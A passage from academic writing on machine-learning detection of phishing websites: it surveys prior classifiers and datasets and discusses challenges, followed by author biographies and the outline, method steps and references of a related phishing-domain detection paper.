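    # Step 3: logistic regression on simple lexical features (assumed weights).
    x = [len(url) / 100, url.count("-"), url.count(".")]
    z = bias + sum(w * v for w, v in zip(weights, x))
    probability = 1.0 / (1.0 + math.exp(-z))
    return "phishing" if probability >= 0.5 else "legitimate"

RESULTS = ["https://examplebank.com/"]  # hypothetical search results for the page's key terms
print(shlr("https://www.examplebank.com/login", RESULTS))
print(shlr("http://198.51.100.7/login", []))
print(shlr("http://secure-login-examplebank.account-verify.example/update", RESULTS))
```

The cheap checks run first, so the learned model is consulted only for pages that neither the search step nor the heuristic rules can decide.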

Authors in Niranjan et al. [ 48 ] proposed an ensemble technique using the voting and stacking methods. They selected the UCI ML phishing dataset and took only 23 of its 30 features for attack detection. Out of a total of 11,055 instances, the dataset has 6157 legitimate and 4898 phishing instances. They used the EKRV model to predict the phishing attack. Authors in Patil et al. [ 53 ] proposed a hybrid solution that uses three approaches: blacklist and whitelist, heuristics, and visual similarity. The proposed methodology monitors all traffic on the end-user system and compares each URL with the whitelist of trusted domains. The website is then analyzed for various feature details. The three possible outcomes are suspicious website, phishing website, and legitimate website. An ML classifier is used to collect data and generate a score. If the score is greater than the threshold, the URL is marked as a phishing attack and immediately blocked. They used LR, DT, and RF to predict the accuracy of their test websites.

Authors in Jagadeesan et al. [ 33 ] utilized RF and SVM to detect phishing attacks. They used two datasets. The first, from the UCI machine learning repository, has 30 features and consists of 2456 entries of phishing and non-phishing URLs. The second consists of 1353 URLs with 10 features and three categories: phishing, non-phishing, and suspicious. Authors in Pandey et al. [ 50 ] used a dataset from a repository of the University of California. The dataset has 10 features and 1353 instances. They trained a hybrid model comprising RF and SVM, which they used to predict the accuracy.

Phishing is a deceitful attempt to obtain sensitive data, for example usernames and passwords, using social engineering approaches to deceive website users into giving up their sensitive credentials [ 24 ]. Phishers prey on human emotion and the urge to follow instructions in a flow. Phishing is so omnipresent in the internet world that it has become a constant threat. The biggest challenge in phishing is that attackers are continuously devising new approaches to deceive users so that they fall prey to phishing traps.

A comparative study of previous works using different approaches is discussed in detail in the above section. Machine learning based approaches, deep learning based approaches, scenario-based approaches, and hybrid techniques have been deployed in the past to tackle this problem. A detailed comparative analysis revealed that machine learning methods are the most frequently used and most effective methods for detecting a phishing attack. Different classification methods such as SVM, RF, ANN, C4.5, k-NN, and DT have been used. Techniques with feature reduction give better performance. Classification with ELM, SVM, LR, C4.5, LC-ELM, kNN, and XGB, combined with feature selection by ANOVA, detected phishing attacks with 99.2% accuracy, which is the highest among all methods proposed so far but comes with trade-offs in terms of computational cost.

The RF method gives the best performance, with the highest accuracy among the classification methods on different datasets. Several studies reported that more than 95% attack detection accuracy can be achieved using an RF classification method. The UCI machine learning dataset is the dataset most commonly used by researchers for phishing attack detection in the past.

In various studies, the researchers also created a scenario-based environment to detect phishing attacks but these solutions are only applicable for a particular environment. Individual users in each organization exhibit different behaviors and individuals in the organization are sometimes aware of the scenarios. The hybrid learning approach is another way to detect phishing attacks as it occasionally gave better accuracy than that of a RF. Researchers are of the view that some ensemble models can further improve performance.

Nowadays, defending against phishing attacks is considered a hard job by system security experts. A feasible detection system should identify phishing attacks with low false positives. The defense approaches discussed so far are based on machine learning and deep learning algorithms. These methods have high computational costs and high false-positive rates; however, they are better at distinguishing phishing attacks. The machine learning techniques provide the best results when compared with other approaches. The most effective defense against phishing attacks is an educated and well-aware employee. Still, people are naturally curious; they have a thirst to explore and know more. To mitigate the risk of falling victim to phishing tricks, organizations should try to keep employees away from their inherent core processes and help them develop a mindset that abstains from clicking suspicious links and webpages.

Current practices and future challenges

A phishing attack is still considered an attractive form of attack for luring novice internet users into passing their private, confidential data to attackers. Different countermeasures are available, yet whenever a solution is proposed to overcome these attacks, attackers exploit the vulnerabilities of that solution to continue their attacks. Several solutions to control phishing attacks have been proposed in the past. A recent increase in the number of phishing attacks linked to COVID-19, performed between March 1 and March 23, 2020, and attacks on online collaboration tools (ZOOM, Microsoft Teams, etc.) have led researchers to pay more attention to this research domain. Most work, whether at the government or corporate level, as well as educational, business, and non-commercial activities, has switched online from the traditional on-premises approach. More users are relying on the web to perform their routine work. This has increased the importance of having a comprehensive phishing attack detection solution with better accuracy and better response time [ 6 – 8 ].

The conventional approaches for phishing attack detection are not accurate and can recognize only about 20% of phishing attacks. ML approaches give better results but with a scalability trade-off, and they are time-consuming even on small datasets. Phishing detection by heuristic techniques gives high false-positive rates. User caution is a key requirement for preventing phishing attacks. Besides educating users about safe browsing, some changes can be made to user interfaces, such as giving dynamic warnings and automatically identifying malicious emails. Classified resources are accessible to IoT devices, but the security architectures and features of these devices are not yet mature, which makes them an obvious target for attackers.

Phishing is a door for all kinds of malware and ransomware. Malware attacks on organizations use ransomware, and a trend that emerged in 2020 is for ransomware operators to demand large ransoms in exchange for not disclosing stolen data. Phishing scams in 2020 deliberately impersonated COVID-19 and healthcare-related organizations and individuals, exploiting unprepared users. It is better to guard the doors at our end and be proactive in defense than to rely on reactive strategies once a phishing attack has happened.

Phishing websites appear to be original and are hard to identify because attackers imitate the appearance and functionality of real websites. Prevention is better than cure, so there is a need for anti-phishing frameworks or web browser plug-ins. These plug-ins or frameworks may perform content filtering and identify and block suspected phishing websites before the user proceeds further. An automated reporting feature can be added that reports phishing attacks from the user’s end to the affected organization, such as a bank or government organization. The time lost on remediation after a phishing attack can damage the productivity and profitability of businesses. In the current scenario, organizations need to provide their employees with awareness and feasible solutions to detect and report phishing attacks proactively and promptly, before they cause any harm.

In the future, an all-inclusive phishing attack detection solution can be designed to identify, report, and block malicious websites without the user’s involvement. If a website asks for login credentials or sensitive information, a framework or smart web plug-in should be responsible for verifying that the website is legitimate and for informing the owner (organization, business, etc.) beforehand. Checking the health of web pages during browsing has become a necessity, and a scalable and robust solution is needed.
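The plug-in behavior described above can be sketched roughly as follows. This is only an illustration under stated assumptions: `TRUSTED_HOSTS` is a hypothetical allowlist, `check_page` is a hypothetical helper, and the only signal used is the presence of a password field. A real plug-in would need far richer checks and an actual reporting channel to the site owner.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hypothetical allowlist (an assumption); a real plug-in needs a maintained list.
TRUSTED_HOSTS = {"bank.example", "login.bank.example"}


class PasswordFieldFinder(HTMLParser):
    """Records whether the page contains an <input type="password"> element."""

    def __init__(self):
        super().__init__()
        self.has_password_field = False

    def handle_starttag(self, tag, attrs):
        input_type = (dict(attrs).get("type") or "").lower()
        if tag == "input" and input_type == "password":
            self.has_password_field = True


def check_page(url, html, trusted_hosts=TRUSTED_HOSTS):
    """Return "allow" or "block_and_report" for a page the user is visiting."""
    finder = PasswordFieldFinder()
    finder.feed(html)
    if not finder.has_password_field:
        return "allow"                      # page does not ask for credentials
    host = (urlparse(url).hostname or "").lower()
    return "allow" if host in trusted_hosts else "block_and_report"
```

A page that asks for a password on a host outside the allowlist yields `"block_and_report"`, which is the point where a plug-in could warn the user and notify the impersonated organization.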

This survey enables researchers to comprehend the various methods, challenges, and trends in phishing attack detection. Preventing phishing attacks is considered a tough job in the system security domain. An efficient detection system should be able to identify phishing attacks with low false positives. The protection strategies discussed in this paper are data mining and heuristics, ML, and deep learning algorithms. Heuristic and data mining methods have high computational costs and high FP rates, but they are better at distinguishing phishing attacks. The ML procedures give the best results compared with the other strategies, and some of them achieve a TP rate of up to 99%. Malicious URLs are created every day, and attackers keep modifying URLs and using new techniques to fool users. Deep learning and machine learning methods are now used to detect phishing attacks. Classification methods such as RF, SVM, C4.5, DT, PCA, and k-NN are also common. These methods are the most useful and effective for detecting phishing attacks. Future research can target a more scalable and robust method, including smart plug-in solutions that tag or label whether a website is legitimate or leads to a phishing attack.

Abbreviations

SVM	Support vector machine
RF	Random forest
IBK	Instance-based learner
ANN	Artificial neural network
RF	Rotation forest
DT	Decision tree
eDRI	Enhanced dynamic rule induction
LR	Linear regression
CART	Classification and regression tree
XGB	Extreme gradient boost
GBDT	Gradient boosting decision tree
AB	AdaBoost
NN	Neural-networks
GBM	Gradient boosting machine
GLM	Generalized linear model
NB	Naive Bayes
KNN	K-nearest neighbor
KS	K-star
LC-ELM	Combination extreme learning machine
ELM	Extreme learning machine
RC	Random committee
PCA	Principal component analysis

Biographies

Abdul Basit is a student at the Department of Computer Science, Air University, Islamabad, Pakistan. He is currently pursuing his Master of Science degree in Computer Science at Air University, Islamabad, Pakistan. His current research interests include but are not limited to cyber security, artificial intelligence, computer vision, network security, IoT, smart city, and application development for smart living. He aims to contribute to interdisciplinary research of computer science and human-related disciplines.

Maham Zafar is a student at the Department of Computer Science, Air University, Islamabad, Pakistan. She is currently pursuing her Master of Science degree in Computer Science at Air University, Islamabad, Pakistan. Her current research interests include but are not limited to cyber security, artificial intelligence, computer vision, network security, IoT, smart city, and application development for smart living.

Xuan Liu (MIEEE’17) graduated from Shandong University, China, and received the M.S. degree from Wuhan Polytechnic University, China, and the Ph.D. degree in computer science and engineering from Southeast University, China. He joined Yangzhou University, China, in 2020. He is serving as an Advisory Editor of Wiley Engineering Reports, an Associate Editor of Springer Telecommunication Systems, IET Smart Cities, Taylor and Francis International Journal of Computers and Applications and KeAi International Journal of Intelligent Networks, an Area Editor of EAI Endorsed Transactions on Internet of Things, the Lead Guest Editor of Elsevier Internet of Things, Wiley Transactions on Emerging Telecommunications Technologies and Wiley Internet Technology Letters, and the Chair of CollaborateCom 2020 workshop. He has served as a TPC Member of ACM MobiCom 2020 workshop, IEEE INFOCOM 2020 workshop, IEEE ICC 2021/2020/2019, IEEE GlobeCom 2020/2019, IEEE WCNC 2021, IFIP/IEEE IM 2021, IEEE PIMRC 2020/2019, IEEE MSN 2020, IEEE VTC 2020/2019/2018, IEEE ICIN 2020, IEEE GIIS 2020, IEEE DASC 2019, APNOMS 2020/2019, AdHoc-Now 2020, FNC 2020/2019, EAI CollaborateCom 2020/2019, and EAI ChinaCom 2019, etc. Furthermore, he has served as a Reviewer for 20+ reputable conferences/journals including IEEE INFOCOM, IEEE ICC, IEEE GlobeCom, IEEE WCNC, IEEE PIMRC, IEEE COMMAG, IEEE TII, IEEE IoT, IEEE CL, Elsevier JNCA, Elsevier FGCS, Springer WINE, Springer TELS, IET SMC, EAI CollaborateCom, and Wiley IJCS, etc. His main research interests focus on UAVs-enabled collaborative networking techniques.

Abdul Rehman Javed is currently a lecturer at the Department of Cyber Security, Air University, Islamabad, Pakistan. He worked with the National Cyber Crimes and Forensics Laboratory, Air University, Islamabad, Pakistan. He received his Master’s degree in Computer Science from the National University of Computer and Emerging Sciences, Islamabad, Pakistan, and his bachelor’s degree in Computer Science from COMSATS University Islamabad (Sahiwal campus). He is a reviewer for many well-known journals, including Sustainable Cities and Society (Elsevier), Journal of Information Security and Applications (Elsevier), IEEE Internet of Things Magazine, Transactions on Internet Technology (ACM), Telecommunication Systems (Springer), IEEE Access, and International Journal of Ad Hoc and Ubiquitous Computing (Inderscience). His current research interests include but are not limited to mobile and ubiquitous computing, data analysis, knowledge discovery, data mining, natural language processing, smart homes, and their applications in human activity analysis, human motion analysis, and e-health. He aims to contribute to interdisciplinary research of computer science and human-related disciplines. He has authored more than 10 peer-reviewed articles on topics related to cybersecurity, mobile computing, and digital forensics.

Zunera Jalil is currently engaged as faculty with the Department of Cyber Security, Faculty of Computing and Artificial Intelligence, and as an investigator with the National Cybercrimes and Forensics Laboratory, Air University, Islamabad, Pakistan. She earned her PhD degree in Computer Science from FAST National University of Computer and Emerging Sciences, Islamabad, Pakistan, in 2010, on a scholarship from the Higher Education Commission of Pakistan. Since then she has worked as faculty with International Islamic University, Islamabad; Iqra University, Islamabad; and Saudi Electronic University, Riyadh, Saudi Arabia. She is a reviewer and editor for multiple renowned international journals in the computing and cyber security domain. She has delivered guest talks at numerous national and international forums. Her current research interests include but are not limited to computer forensics, cyber-attack detection using deep learning, intelligent systems, criminal profiling, and data privacy protection.

Kashif Kifayat received the Ph.D. degree in cyber security from Liverpool John Moores University, Liverpool, U.K., in 2008. He is currently a Professor and the Chair of the Cyber Security Department, Air University, Islamabad, Pakistan. He is highly skilled in Machine Learning, Matlab, Deep Learning, Algorithms, Big Data Analytics, Data Science, C++, Python, R, and LaTeX. As part of the National Center of Cyber Security, he is actively engaged in mobile forensics.

Publisher's Note

Springer Nature remains neutral with regard to jurisdictional claims in published maps and institutional affiliations.

Contributor Information

Abdul Basit, Maham Zafar, Xuan Liu, Abdul Rehman Javed, Zunera Jalil, Kashif Kifayat.


Detecting phishing domains using machine learning.

1. Introduction

2. Background

2.1. Decision Tree

2.2. Random Forest

2.3. Support Vector Machine

2.4. Ensemble Classification Techniques

2.4.1. Bagging

2.4.2. Boosting

2.4.3. Stacking

2.5. Ensemble Classification Techniques

3. Related Work

4. Methodology

4.1. Dataset Used: UCI Phishing Websites

4.2. Implemented Algorithm

5. Model’s Flowchart

Read the UCI phishing websites dataset of URLs.
Check the data features.
Check the proposed data types.
Clean missing values from the data.
Split the data into training and testing sets.
Train the model using four machine-learning techniques: RF, SVM, DT, and ANN.
Evaluate each model’s performance on the testing set and calculate its accuracy.
Select the best model as the final model.
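The steps above can be sketched as a small, dependency-free pipeline. This is not the authors' implementation: the two classifiers below are deliberately simple stand-ins (a majority-class baseline and a 1-nearest-neighbour rule) for the RF, SVM, DT, and ANN models named in the list, and all function and class names are hypothetical. Any object with `fit` and `predict` methods, which is the interface scikit-learn estimators also expose, could be plugged into `select_best_model` instead.

```python
import random


def clean_missing(rows):
    """Drop rows that contain a missing (None) value."""
    return [row for row in rows if None not in row]


def train_test_split(rows, test_ratio=0.3, seed=0):
    """Shuffle the rows and split them into training and testing sets."""
    shuffled = rows[:]
    random.Random(seed).shuffle(shuffled)
    n_test = round(len(shuffled) * test_ratio)
    return shuffled[n_test:], shuffled[:n_test]


class MajorityClass:
    """Stand-in model: always predicts the most common training label."""

    def fit(self, X, y):
        self.label = max(set(y), key=y.count)
        return self

    def predict(self, X):
        return [self.label for _ in X]


class NearestNeighbour:
    """Stand-in model: 1-nearest-neighbour using Hamming distance."""

    def fit(self, X, y):
        self.X, self.y = X, y
        return self

    def predict(self, X):
        def nearest(x):
            dists = [sum(a != b for a, b in zip(x, t)) for t in self.X]
            return self.y[dists.index(min(dists))]
        return [nearest(x) for x in X]


def accuracy(y_true, y_pred):
    """Fraction of predictions that match the true labels."""
    return sum(t == p for t, p in zip(y_true, y_pred)) / len(y_true)


def select_best_model(rows, models, test_ratio=0.3, seed=0):
    """Clean, split, train every candidate, evaluate, and pick the best.

    Each row is a list of feature values with the class label in the last position.
    """
    train, test = train_test_split(clean_missing(rows), test_ratio, seed)
    X_train, y_train = [r[:-1] for r in train], [r[-1] for r in train]
    X_test, y_test = [r[:-1] for r in test], [r[-1] for r in test]
    scores = {
        name: accuracy(y_test, model.fit(X_train, y_train).predict(X_test))
        for name, model in models.items()
    }
    best = max(scores, key=scores.get)
    return best, scores
```

Calling `select_best_model(rows, {"baseline": MajorityClass(), "1-NN": NearestNeighbour()})` returns the name of the highest-scoring model together with the accuracy of every candidate on the held-out split.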

6. Findings and Analysis

7. Conclusions and Future Works

Author Contributions

Institutional Review Board Statement

Informed Consent Statement

Data Availability Statement

Conflicts of Interest

Cabaj, K.; Domingos, D.; Kotulski, Z.; Respício, A. Cybersecurity Education: Evolution of the Discipline and Analysis of Master Programs. Comput. Secur. 2018, 75, 24–35.
Iwendi, C.; Jalil, Z.; Javed, A.R.; Reddy, G.T.; Kaluri, R.; Srivastava, G.; Jo, O. KeySplitWatermark: Zero Watermarking Algorithm for Software Protection Against Cyber-Attacks. IEEE Access 2020, 8, 72650–72660.
Rehman Javed, A.; Jalil, Z.; Atif Moqurrab, S.; Abbas, S.; Liu, X. Ensemble Adaboost Classifier for Accurate and Fast Detection of Botnet Attacks in Connected Vehicles. Trans. Emerg. Telecommun. Technol. 2020, 33, e4088.
Conklin, W.A.; Cline, R.E.; Roosa, T. Re-Engineering Cybersecurity Education in the US: An Analysis of the Critical Factors. In Proceedings of the 2014 47th Hawaii International Conference on System Sciences, IEEE, Waikoloa, HI, USA, 6–9 January 2014; pp. 2006–2014.
Javed, A.R.; Usman, M.; Rehman, S.U.; Khan, M.U.; Haghighi, M.S. Anomaly Detection in Automated Vehicles Using Multistage Attention-Based Convolutional Neural Network. IEEE Trans. Intell. Transp. Syst. 2021, 22, 4291–4300.
Mittal, M.; Iwendi, C.; Khan, S.; Rehman Javed, A. Analysis of Security and Energy Efficiency for Shortest Route Discovery in Low-energy Adaptive Clustering Hierarchy Protocol Using Levenberg-Marquardt Neural Network and Gated Recurrent Unit for Intrusion Detection System. Trans. Emerg. Telecommun. Technol. 2020, 32, e3997.
Bleau, H. Global Fraud and Cybercrime Forecast. Retrieved RSA 2017. Available online: https://www.rsa.com/en-us/resources/2017-global-fraud (accessed on 19 November 2021).
Computer Fraud & Security. APWG: Phishing Activity Trends Report Q4 2018. Comput. Fraud Secur. 2019, 2019, 4.
Hulten, G.J.; Rehfuss, P.S.; Rounthwaite, R.; Goodman, J.T.; Seshadrinathan, G.; Penta, A.P.; Mishra, M.; Deyo, R.C.; Haber, E.J.; Snelling, D.A.W. Finding Phishing Sites; Google Patents: Microsoft Corporation, Redmond, WA, USA, 2014.
What Is Phishing and How to Spot a Potential Phishing Attack. PsycEXTRA Dataset. Available online: https://www.imperva.com/learn/application-security/phishing-attack-scam/ (accessed on 20 November 2021).
Gupta, B.B.; Tewari, A.; Jain, A.K.; Agrawal, D.P. Fighting against Phishing Attacks: State of the Art and Future Challenges. Neural Comput. Appl. 2016, 28, 3629–3654.
Zhu, E.; Ju, Y.; Chen, Z.; Liu, F.; Fang, X. DTOF-ANN: An Artificial Neural Network Phishing Detection Model Based on Decision Tree and Optimal Features. Appl. Soft Comput. 2020, 95, 106505.
Machine Learning Decision Tree Classification Algorithm—Javatpoint. Available online: https://www.javatpoint.com/machine-learning-decision-tree-classification-algorithm (accessed on 25 November 2021).
Breiman, L. Random Forests. Mach. Learn. 2001, 45, 5–32.
Friedman, J.H. The Elements of Statistical Learning: Data Mining, Inference, and Prediction; Springer Open: Berlin/Heidelberg, Germany, 2017.
Brownlee, J. Train-Test Split for Evaluating Machine Learning Algorithms. Mach. Learn. Mastery 2020, 23. Available online: https://machinelearningmastery.com/train-test-split-for-evaluating-machine-learning-algorithms/ (accessed on 25 December 2021).
Subasi, A.; Molah, E.; Almkallawi, F.; Chaudhery, T.J. Intelligent Phishing Website Detection Using Random Forest Classifier. In Proceedings of the 2017 International Conference on Electrical and Computing Technologies and Applications (ICECTA), Ras Al Khaimah, United Arab Emirates, 21–23 November 2017; pp. 1–5.
Jeremybeauchamp English: A Visual Comparison between the Complexity of Decision Trees and Random Forests. 2020. Available online: https://commons.wikimedia.org/wiki/File:Decision_Tree_vs._Random_Forest.png (accessed on 27 December 2021).
Sönmez, Y.; Tuncer, T.; Gökal, H.; Avcı, E. Phishing Web Sites Features Classification Based on Extreme Learning Machine. In Proceedings of the 2018 6th International Symposium on Digital Forensic and Security (ISDFS), IEEE, Antalya, Turkey, 22–25 March 2018; pp. 1–5.
ResearchGate. Figure 2. Classification of Data by Support Vector Machine (SVM). Available online: https://www.researchgate.net/figure/Classification-of-data-by-support-vector-machine-SVM_fig8_304611323 (accessed on 6 October 2021).
Cristianini, N.; Shawe-Taylor, J. An Introduction to Support Vector Machines and Other Kernel-Based Learning Methods; Cambridge University Press: Cambridge, UK, 2000.
Gomes, H.M.; Barddal, J.P.; Enembreck, F.; Bifet, A. A Survey on Ensemble Learning for Data Stream Classification. ACM Comput. Surv. CSUR 2017, 50, 1–36.
Zhou, Z.-H. Ensemble Methods: Foundations and Algorithms; Chapman and Hall/CRC: London, UK, 2019; ISBN 1-4398-3005-3.
Yaman, E.; Subasi, A. Comparison of Bagging and Boosting Ensemble Machine Learning Methods for Automated EMG Signal Classification. BioMed Res. Int. 2019, 2019, 9152506.
Bagging (Bootstrap Aggregation)—Overview, How It Works, Advantages—Ro.Outletshop2021.Ru. Available online: https://corporatefinanceinstitute.com/resources/data-science/bagging-bootstrap-aggregation/#:~:text=Bagging%20offers%20the%20advantage%20of,of%20interpretability%20of%20a%20model. (accessed on 6 October 2021).
Junior, J.R.B.; do Carmo Nicoletti, M. An Iterative Boosting-Based Ensemble for Streaming Data Classification. Inf. Fusion 2019, 45, 66–78.
Zhou, Z.-H. Ensemble Learning. In Machine Learning; Springer: Berlin/Heidelberg, Germany, 2021; pp. 181–210.
AdaBoost Classifier in Python—DataCamp. Available online: https://www.datacamp.com/tutorial/adaboost-classifier-python (accessed on 6 October 2021).
Abiodun, O.I.; Jantan, A.; Omolara, A.E.; Dada, K.V.; Mohamed, N.A.; Arshad, H. State-of-the-Art in Artificial Neural Network Applications: A Survey. Heliyon 2018, 4, e00938.
McCulloch, W.S.; Pitts, W. A Logical Calculus of the Ideas Immanent in Nervous Activity. Bull. Math. Biophys. 1943, 5, 115–133.
Jin, D.; Wang, P.; Bai, Z.; Wang, X.; Peng, H.; Qi, R.; Yu, Z.; Zhuang, G. Analysis of Bacterial Community in Bulking Sludge Using Culture-Dependent and-Independent Approaches. J. Environ. Sci. 2011, 23, 1880–1887.
Liu, Z.-W.; Liang, F.-N.; Liu, Y.-Z. Artificial Neural Network Modeling of Biosorption Process Using Agricultural Wastes in a Rotating Packed Bed. Appl. Therm. Eng. 2018, 140, 95–101.
Oliveira, V.; Sousa, V.; Dias-Ferreira, C. Artificial Neural Network Modelling of the Amount of Separately-Collected Household Packaging Waste. J. Clean. Prod. 2019, 210, 401–409.
Basit, A.; Zafar, M.; Liu, X.; Javed, A.R.; Jalil, Z.; Kifayat, K. A Comprehensive Survey of AI-Enabled Phishing attacks detection techniques. Telecommun. Syst. 2021, 76, 139–154. Available online: https://link.springer.com/article/10.1007/s11235-020-00733-2 (accessed on 27 September 2021).
A Comprehensive Guide to Understand and Implement Text Classification in Python. Anal. Vidhya 2018. Available online: http://www.shivambansal.com/blog/text-classification-guide/ (accessed on 25 October 2021).
Sánchez-Paniagua, M.; Fernández, E.F.; Alegre, E.; Al-Nabki, W.; González-Castro, V. Phishing URL Detection: A Real-Case Scenario Through Login URLs. IEEE Access 2022, 10, 42949–42960.
James, J.; Sandhya, L.; Thomas, C. Detection of Phishing URLs Using Machine Learning Techniques. In Proceedings of the 2013 International Conference on Control Communication and Computing (ICCC), Thiruvananthapuram, India, 13–15 December 2013; Available online: https://ieeexplore.ieee.org/abstract/document/6731669 (accessed on 26 September 2021).
Liew, S.W.; Sani NF, M.; Abdullah, M.T.; Yaakob, R.; Sharum, M.Y. An Effective Security Alert Mechanism for Real-Time Phishing Tweet Detection on Twitter—ScienceDirect. Comput. Secur. 2019, 83, 201–207. Available online: https://www.sciencedirect.com/science/article/pii/S0167404818309040 (accessed on 26 September 2021).
Hutchinson, S.; Zhang, Z.; Liu, Q. Detecting Phishing Websites with Random Forest. In Proceedings of the Machine Learning and Intelligent Communications, Hangzhou, China, 6–8 July 2018; Meng, L., Zhang, Y., Eds.; Springer International Publishing: Cham, Switzerland, 2018; pp. 470–479.
Patil, V.; Thakkar, P.; Shah, C.; Bhat, T.; Godse, S.P. Detection and Prevention of Phishing Websites Using Machine Learning Approach. In Proceedings of the 2018 Fourth International Conference on Computing Communication Control and Automation (ICCUBEA), Pune, India, 19–18 August 2018; pp. 1–5.
Joshi, A.; Pattanshetti, P.T.R. Phishing Attack Detection Using Feature Selection Techniques; Social Science Research Network: Rochester, NY, USA, 2019.
Ubing, A.; Kamilia, S.; Abdullah, A.; Zaman, N.; Supramaniam, M. Phishing Website Detection: An Improved Accuracy through Feature Selection and Ensemble Learning. Int. J. Adv. Comput. Sci. Appl. 2019, 10, 252–257.
Li, Y.; Yang, Z.; Chen, X.; Yuan, H.; Liu, W. A Stacking Model Using URL and HTML Features for Phishing Webpage Detection. Future Gener. Comput. Syst. 2019, 94, 27–39.
Zamir, A.; Khan, H.U.; Iqbal, T.; Yousaf, N.; Aslam, F.; Anjum, A.; Hamdani, M. Phishing Web Site Detection Using Diverse Machine Learning Algorithms. Electron. Libr. 2020, 38, 65–80.
Alsariera, Y.A.; Adeyemo, V.E.; Balogun, A.O.; Alazzawi, A.K. AI Meta-Learners and Extra-Trees Algorithm for the Detection of Phishing Websites. IEEE Access 2020, 8, 142532–142542.
Ali, W.; Malebary, S. Particle Swarm Optimization-Based Feature Weighting for Improving Intelligent Phishing Website Detection. IEEE Access 2020, 8, 116766–116780.
Adebowale, M.A.; Lwin, K.T.; Sanchez, E.; Hossain, M.A. Intelligent Web-Phishing Detection and Protection Scheme Using Integrated Features of Images, Frames and Text—ScienceDirect. Expert Syst. Appl. 2019, 115, 300–313. Available online: https://www.sciencedirect.com/science/article/abs/pii/S0957417418304925 (accessed on 26 September 2021).
El Aassal, A.; Baki, S.; Das, A.; Verma, R.M. An In-Depth Benchmarking and Evaluation of Phishing Detection Research for Security Needs. IEEE Access 2020, 8, 22170–22192. Available online: https://ieeexplore.ieee.org/abstract/document/8970564 (accessed on 27 September 2021).
Subasi, A.; Kremic, E. Comparison of Adaboost with MultiBoosting for Phishing Website Detection—ScienceDirect. Procedia Comput. Sci. 2020, 168, 272–278. Available online: https://www.sciencedirect.com/science/article/pii/S1877050920303902 (accessed on 27 September 2021).
Mao, J.; Bian, J.; Tian, W.; Zhu, S.; Wei, T.; Li, A.; Liang, Z. Phishing Page Detection via Learning Classifiers from Page Layout Feature. EURASIP J. Wirel. Commun. Netw. 2019, 2019, 43. Available online: https://jwcn-eurasipjournals.springeropen.com/articles/10.1186/s13638-019-1361-0 (accessed on 27 September 2021).
A Novel Machine Learning Approach to Detect Phishing Websites. Available online: https://ieeexplore.ieee.org/abstract/document/8474040/ (accessed on 27 September 2021).
Chen, Y.H.; Chen, J.L. AI@ntiPhish—Machine Learning Mechanisms for Cyber-Phishing Attack. IEICE Trans. Inf. Syst. 2019, 102, 878–887. Available online: https://www.jstage.jst.go.jp/article/transinf/E102.D/5/E102.D_2018NTI0001/_article/-char/ja/ (accessed on 27 September 2021).
Abdelhamid, N.; Thabtah, F.; Abdel-Jaber, H. Phishing Detection: A Recent Intelligent Machine Learning Comparison Based on Models Content and Features. In Proceedings of the 2017 IEEE International Conference on Intelligence and Security Informatics, Beijing, China, 22–24 July 2017; Available online: https://ieeexplore.ieee.org/abstract/document/8004877 (accessed on 27 September 2021).
Jain, A.K.; Gupta, B.B. Towards Detection of Phishing Websites on Client-Side Using Machine Learning Based Approach. Telecommun. Syst. 2018, 68, 687–700. Available online: https://link.springer.com/article/10.1007/s11235-017-0414-0 (accessed on 27 September 2021).
Lakshmi, L.; Reddy, M.P.; Santhaiah, C.; Reddy, U.J. Smart Phishing Detection in Web Pages Using Supervised Deep Learning Classification and Optimization Technique ADAM. Wirel. Pers. Commun. 2021, 118, 3549–3564.
Sahingoz, O.K.; Buber, E.; Demir, O.; Diri, B. Machine Learning Based Phishing Detection from URLs—ScienceDirect. Expert Syst. Appl. 2019, 117, 345–357. Available online: https://www.sciencedirect.com/science/article/abs/pii/S0957417418306067 (accessed on 27 September 2021).
Jagadeesan, S. URL Phishing Analysis Using Random Forest. Int. J. Pure Appl. Math. 2018, 118, 4159–4163.
Niranjan, A.; Haripriya, D.K.; Pooja, R.; Sarah, S.; Deepa Shenoy, P.; Venugopal, K.R. EKRV: Ensemble of KNN and Random Committee Using Voting for Efficient Classification of Phishing; Springer: Singapore, 2019; Available online: https://link.springer.com/chapter/10.1007/978-981-13-1708-8_37 (accessed on 27 September 2021).
Chiew, K.L.; Tan, C.L.; Wong, K.; Yong, K.S.; Tiong, W.K. A New Hybrid Ensemble Feature Selection Framework for Machine Learning-Based Phishing Detection System—ScienceDirect. Inf. Sci. 2019, 484, 153–166. Available online: https://www.sciencedirect.com/science/article/abs/pii/S0020025519300763 (accessed on 27 September 2021).
Pandey, A.; Gill, N.; Sai Prasad Nadendla, K.; Thaseen, I.S. Identification of Phishing Attack in Websites Using Random Forest-SVM Hybrid Model. In Proceedings of the Intelligent Systems Design and Applications: 18th International Conference on Intelligent Systems Design and Applications (ISDA 2018), Vellore, India, 6–8 December 2018; Springer International Publishing: Midtown Manhattan, NY, USA, 2020. Available online: https://link.springer.com/chapter/10.1007/978-3-030-16660-1_12 (accessed on 27 September 2021).
Ali, W.; Ahmed, A.A. Hybrid Intelligent Phishing Website Prediction Using Deep Neural Networks with Genetic Algorithm-Based Feature Selection and Weighting. IET Inf. Secur. 2019, 13, 659–669.
Aljofey, A.; Jiang, Q.; Qu, Q.; Huang, M.; Niyigena, J.P. An Effective Phishing Detection Model Based on Character Level Convolutional Neural Network from URL. Electronics 2020, 9, 1514. Available online: https://www.mdpi.com/2079-9292/9/9/1514 (accessed on 27 September 2021).
Shie, E.W.S. Critical Analysis of Current Research Aimed at Improving Detection of Phishing Attacks. Sel. Comput. Res. Pap. 2020, 45, 45–53.
Maurya, S.; Jain, A. Deep Learning to Combat Phishing. J. Stat. Manag. Syst. 2020, 23, 945–957.
Mao, J.; Bian, J.; Tian, W.; Zhu, S.; Wei, T.; Li, A.; Liang, Z. Detecting Phishing Websites via Aggregation Analysis of Page Layouts—ScienceDirect. Procedia Comput. 2018, 129, 224–230. Available online: https://www.sciencedirect.com/science/article/pii/S187705091830276X (accessed on 27 September 2021).
Yang, L.; Zhang, J.; Wang, X.; Li, Z.; Li, Z.; He, Y. An Improved ELM-Based and Data Preprocessing Integrated Approach for Phishing Detection Considering Comprehensive Features—ScienceDirect. Expert Syst. Appl. 2021, 165, 113863. Available online: https://www.sciencedirect.com/science/article/abs/pii/S0957417420306734 (accessed on 27 September 2021).
Anupam, S.; Kar, A.K. Phishing Website Detection Using Support Vector Machines and Nature-Inspired Optimization Algorithms. Telecommun. Syst. 2021, 76, 17–32. Available online: https://link.springer.com/article/10.1007/s11235-020-00739-w (accessed on 27 September 2021).
